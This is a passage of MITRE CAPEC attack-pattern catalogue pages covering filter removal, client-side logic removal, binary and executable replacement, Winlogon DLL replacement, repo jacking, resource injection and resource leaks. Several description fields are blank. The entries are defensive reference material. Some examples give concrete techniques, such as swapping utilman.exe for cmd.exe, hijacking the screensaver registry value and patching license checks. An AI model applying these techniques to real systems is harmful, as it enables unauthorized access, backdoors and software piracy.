Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Abstraction, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-200: Removal of filters: Input filters, output filters, data masking

Attack Pattern ID: 200

Abstraction: Detailed

View customized information:

Description

Extended Description

For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information.

For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records.

This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	207	Removing Important Client Functionality

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The target application must utilize some sort of filtering mechanism (input, output, or data masking).

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-207: Removing Important Client Functionality

Attack Pattern ID: 207

Abstraction: Standard

View customized information:

Description

An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.

Extended Description

Adversaries can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an adversary can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	22	Exploiting Trust in Client
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	200	Removal of filters: Input filters, output filters, data masking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	208	Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probing: The adversary probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.

Techniques
The adversary probes by exploring an application's functionality and its underlying mapping to server-side components.
The adversary reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.

Experiment

Determine which functionality to disable or remove: The adversary tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.
Techniques
The adversary reverse engineers the client-side code to determine which functionality to disable or remove.

Exploit

Disable or remove the critical functionality from the client code: Once the functionality has been determined, the adversary disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.
Techniques
The adversary disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.

Prerequisites

The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client.

Skills Required

[Level: High]

To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.

[Level: Low]

The adversary installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools.

Resources Required

The adversary must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Integrity	Modify Data
Confidentiality	Read Data
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.

Design: Ship client-side application with integrity checks (code signing) when possible.

Design: Use obfuscation and other techniques to prevent reverse engineering the client code.

Example Instances

The adversary reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the adversary simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.

The adversary uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the adversary directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).

Related Weaknesses

CWE-ID	Weakness Name
602	Client-Side Enforcement of Server-Side Security

References

[REF-75] "Wikipedia". Greasemonkey. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Greasemonkey>.

[REF-76] "Firebug". <http://getfirebug.com/>.

[REF-77] "Mozilla Firefox Add-ons". Greasemonkey. <https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Vulnerabilities
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Example_Instances, Execution_Flow, Extended_Description, Resources_Required, Skills_Required
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Removing Important Functionality from the Client

CAPEC-208: Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements

Attack Pattern ID: 208

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	207	Removing Important Client Functionality

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations.

Resources Required

The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this.

Related Weaknesses

CWE-ID	Weakness Name
602	Client-Side Enforcement of Server-Side Security

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required

CAPEC-642: Replace Binaries

Attack Pattern ID: 642

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The attacker must be able to place the malicious binary on the target machine.

Mitigations

Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.

Example Instances

The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.

By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\Windows\system32\. This value is set in the registry at HKEY_CURRENT_USER\Control Panel\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently.

Related Weaknesses

CWE-ID	Weakness Name
732	Incorrect Permission Assignment for Critical Resource

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1505.005	Server Software Component: Terminal Services DLL
1554	Compromise Client Software Binary
1574.005	Hijack Execution Flow:Executable Installer File Permissions Weakness

Relevant to the OWASP taxonomy mapping

Entry Name
Binary planting

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-31 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-31 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Example_Instances, Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-556: Replace File Extension Handlers

Attack Pattern ID: 556

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1546.001	Event Triggered Execution:Change Default File Association

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-558: Replace Trusted Executable

Attack Pattern ID: 558

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Example Instances

Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. "C:\Windows\System32\utilman.exe") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1505.005	Server Software Component: Terminal Services DLL
1546.008	Event Triggered Execution: Accessibility Features

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-579: Replace Winlogon Helper DLL

Attack Pattern ID: 579

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Changes to registry entries in "HKLM\Software\Microsoft\Windows NT\Winlogon\Notify" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1547.004	Boot or Logon Autostart Execution: Winlogon helper DLL

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-695: Repo Jacking

Attack Pattern ID: 695

Abstraction: Detailed

View customized information:

Description

An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.

Extended Description

Software developers may directly reference a VCS repository (i.e., via a hardcoded URL) within source code to integrate the repository as a dependency for the underlying application. If the repository owner/maintainer modifies the repository name, changes their VCS username, or transfers ownership of the repository, the VCS implements a redirect to the new repository location so that existing software referencing the repository will not break. However, if the original location of the repository is reestablished, the VCS will revert to resolving the hardcoded path. Adversaries may, therefore, re-register deleted or previously used usernames and recreate repositories with malicious code to infect applications referencing the repository. When an application then fetches the desired dependency, it will now reference the adversary's malicious repository since the hardcoded repository path is once again active. This ultimately allows the adversary to infect numerous applications, while achieving a variety of negative technical impacts.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Identify target: The adversary must first identify a target repository that is commonly used and whose owner/maintainer has either changed/deleted their username or transferred ownership of the repository and then deleted their account. The target should typically be a popular and widely used package, as to increase the scope of the attack.

Experiment

Recreate initial repository path: The adversary re-registers the account that was renamed/deleted by the target repository's owner/maintainer and recreates the target repository with malicious code intended to exploit an application. These steps may need to happen in reverse (i.e., recreate repository and then rename an existing account to the target account) if protections are in place to prevent repository reuse.

Exploit

Exploit victims: The adversary's malicious code is incorporated into applications that directly reference the initial repository, which further allows the adversary to conduct additional attacks.

Prerequisites

Identification of a popular repository that may be directly referenced in numerous software applications

A repository owner/maintainer who has recently changed their username or deleted their account

Skills Required

[Level: Low]

Ability to create an account on a VCS hosting site and recreate an existing directory structure.

[Level: Low]

Ability to create malware that can exploit various software applications.

Consequences

Scope	Impact	Likelihood
Integrity	Read Data Modify Data
Access Control Authorization	Execute Unauthorized Commands Alter Execution Logic Gain Privileges

Mitigations

Leverage dedicated package managers instead of directly linking to VCS repositories.

Utilize version pinning and lock files to prevent use of maliciously modified repositories.

Implement "vendoring" (i.e., including third-party dependencies locally) and leverage automated testing techniques (e.g., static analysis) to determine if the software behaves maliciously.

Leverage automated tools, such as Checkmarx's "ChainJacking" tool, to determine susceptibility to Repo Jacking attacks.

Example Instances

In May 2022, the CTX Python package and PhPass PHP package were both exploited by the same adversary via Repo Jacking attacks. For the CTX package, the adversary performed an account takeover via a password reset, due to an expired domain-hosting email. The attack on PhPass entailed bypassing GitHub's authentication for retired repositories. In both cases, sensitive data in the form of API keys and passwords, each stored in the form of environment variables, were exfiltrated. [REF-732] [REF-733]

In October 2021, the popular JavaScript library UAParser.js was exploited via the takeover of the author's Node Package Manager (NPM) account. The adversary-provided malware downloaded and executed binaries from a remote server to conduct crypto-mining and to exfiltrate sensitive data on Windows systems. This was a wide-scale attack as the package receives 8 to 9 million downloads per week. [REF-732]

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools

References

[REF-722] Indiana Moreau. "Repo Jacking: Exploiting the Dependency Supply Chain". Security Innovation. 2020-10-22. <https://www.concretecms.org/about/project-news/security/supply-chain-hack-phpass-repo-jacking>. URL validated: 2022-09-09.

[REF-732] Theo Burton. "CyRC Vulnerability Analysis: Repo jacking in the software supply chain". Synopsys. 2022-08-02. <https://www.synopsys.com/blogs/software-security/cyrc-vulnerability-analysis-repo-jacking/>. URL validated: 2022-09-09.

[REF-733] Jossef Harush. "Attacker Caught Hijacking Packages Using Multiple Techniques to Steal AWS Credentials". Checkmarx. 2022-05-25. <https://checkmarx.com/blog/attacker-caught-hijacking-packages-using-multiple-techniques-to-steal-aws-credentials/>. URL validated: 2022-09-09.

[REF-734] Jossef Harush. "GitHub RepoJacking Weakness Exploited in the Wild by Attackers". Checkmarx. 2022-05-27. <https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/>. URL validated: 2022-09-09.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)
Modifications
Modification Date	Modifier	Organization
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-671: Requirements for ASIC Functionality Maliciously Altered

Attack Pattern ID: 671

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

An adversary would need to have access to a foundry’s or chip maker’s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based.

Skills Required

[Level: High]

An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded.

Consequences

Scope	Impact	Likelihood
Integrity	Alter Execution Logic

Mitigations

Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.

Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.

Require that provenance of COTS microelectronic components be known whenever procured.

Conduct detailed vendor assessment before acquiring COTS hardware.

Example Instances

An adversary with access to ASIC functionality requirements for various customers, targets a particular customer’s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer’s capability needs.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-240: Resource Injection

Attack Pattern ID: 240

Abstraction: Meta

View customized information:

Description

An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	610	Cellular Data Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Ensure all input content that is delivered to client is sanitized against an acceptable content specification.

Perform input validation for all content.

Enforce regular patching of software.

Related Weaknesses

CWE-ID	Weakness Name
99	Improper Control of Resource Identifiers ('Resource Injection')

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Resource Injection

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description, Description Summary
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings

CAPEC-131: Resource Leak Exposure

Attack Pattern ID: 131

Abstraction: Meta

View customized information:

Description

An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.

Extended Description

Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.

In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.

Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The target must have a resource leak that the adversary can repeatedly trigger.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption

Mitigations

If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).

Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)

Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.

Related Weaknesses

CWE-ID	Weakness Name
404	Improper Resource Shutdown or Release

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1499	Endpoint Denial of Service

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
10	Denial of Service

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-154: Resource Location Spoofing

Attack Pattern ID: 154

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
